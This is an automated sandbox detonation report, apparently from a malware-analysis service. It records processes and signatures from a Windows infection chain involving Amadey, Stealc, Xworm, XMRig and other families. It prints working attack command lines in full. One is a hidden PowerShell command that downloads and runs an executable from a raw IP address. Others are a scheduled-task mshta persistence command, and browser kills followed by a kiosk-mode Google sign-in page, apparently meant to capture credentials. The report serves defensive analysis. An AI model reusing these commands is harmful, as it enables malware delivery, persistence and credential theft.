| C:\Windows\SysWOW64\schtasks.exe | schtasks /create /tn 7p7BqmaXq2n /tr "mshta C:\Users\Admin\AppData\Local\Temp\yJVRHf66T.hta" /sc minute /mo 25 /ru "Admin" /f |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; |
| C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE | "C:\Users\Admin\AppData\Local\TempZHNWSZTUJO4E7FX0YUKLKS2OB6UEOAJP.EXE" |
| C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe | "C:\Users\Admin\AppData\Local\Temp\10107870101\4665ecc86d.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | "C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe | "C:\Users\Admin\AppData\Local\Temp\10107880101\76e0807425.exe" |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 984 -s 508 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 1020 |
| C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe | "C:\Users\Admin\AppData\Local\Temp\10107890101\a56a18c370.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe | "C:\Users\Admin\AppData\Local\Temp\10107900101\2a1bc9d8d6.exe" |
| C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe | "C:\Users\Admin\AppData\Local\Temp\10107910101\a2a6d35a13.exe" |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 1204 |
| C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe | "C:\Users\Admin\AppData\Local\Temp\10107920101\a3f26c3fce.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe | "C:\Users\Admin\AppData\Local\Temp\10107930101\b668242231.exe" |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /F /IM firefox.exe /T |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /F /IM chrome.exe /T |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /F /IM msedge.exe /T |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /F /IM opera.exe /T |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /F /IM brave.exe /T |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.994059294\268589583" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6286e659-a441-4882-a98a-0a5ee3cdc511} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1292 b6ba358 gpu |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.650304462\1396595912" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e3ef407-e24a-4d03-8b85-0c5c0aa613a5} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1500 d73f58 socket |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.2.1799686709\1027310904" -childID 1 -isForBrowser -prefsHandle 2068 -prefMapHandle 2064 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5363fbb2-0994-4857-95eb-e7a2926154be} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2080 19da9058 tab |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.3.550897298\1798261468" -childID 2 -isForBrowser -prefsHandle 2896 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f518dac-b087-470d-9016-eaf44777df06} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 2916 d62d58 tab |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.4.931231338\790430380" -childID 3 -isForBrowser -prefsHandle 3944 -prefMapHandle 3940 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3d67aeed-8ac1-42bd-b36f-e1fad7f623f6} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 3956 208dad58 tab |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.5.1751415405\1535557933" -childID 4 -isForBrowser -prefsHandle 4064 -prefMapHandle 4068 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8717bd4e-e160-44c8-ab53-2f49ecb2f066} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4052 208db058 tab |
| C:\Program Files\Mozilla Firefox\firefox.exe | "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.6.701966344\1456685151" -childID 5 -isForBrowser -prefsHandle 4228 -prefMapHandle 4232 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 892 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2376d85f-4b17-4b2b-a188-0facedd92900} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 4216 20ef7b58 tab |
| C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe | "C:\Users\Admin\AppData\Local\Temp\10107940101\e16f9098dd.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe | "C:\Users\Admin\AppData\Local\Temp\10107950101\cnntXtU.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe | "C:\Users\Admin\AppData\Local\Temp\10107960101\nhDLtPT.exe" |
| C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe | "C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe | "C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe" |
| C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe | "C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe" |
| C:\Users\Admin\AppData\Local\Temp\onefile_3644_133856914229929000\chromium.exe | C:\Users\Admin\AppData\Local\Temp\10107990101\SvhQA35.exe |
| C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe | "C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe" |
C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108000101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 500
C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108010101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108020101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3672 -s 512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 1032
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted: 2025-03-05 23:34
Reported: 2025-03-05 23:37
Platform: win10v2004-20250217-en
Max time kernel: 119s
Max time network: 152s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
Detects Healer an antivirus disabler dropper
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\035c4d64c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107920101\\035c4d64c6.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f3c10671.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107930101\\a6f3c10671.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\99878a5969.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\99878a5969.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\xLUFfgfR\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4abf414f45.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107910101\\4abf414f45.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3836 set thread context of 428 | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe |
| PID 3368 set thread context of 4384 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 1820 set thread context of 4408 | N/A | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 2856 set thread context of 2416 | N/A | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
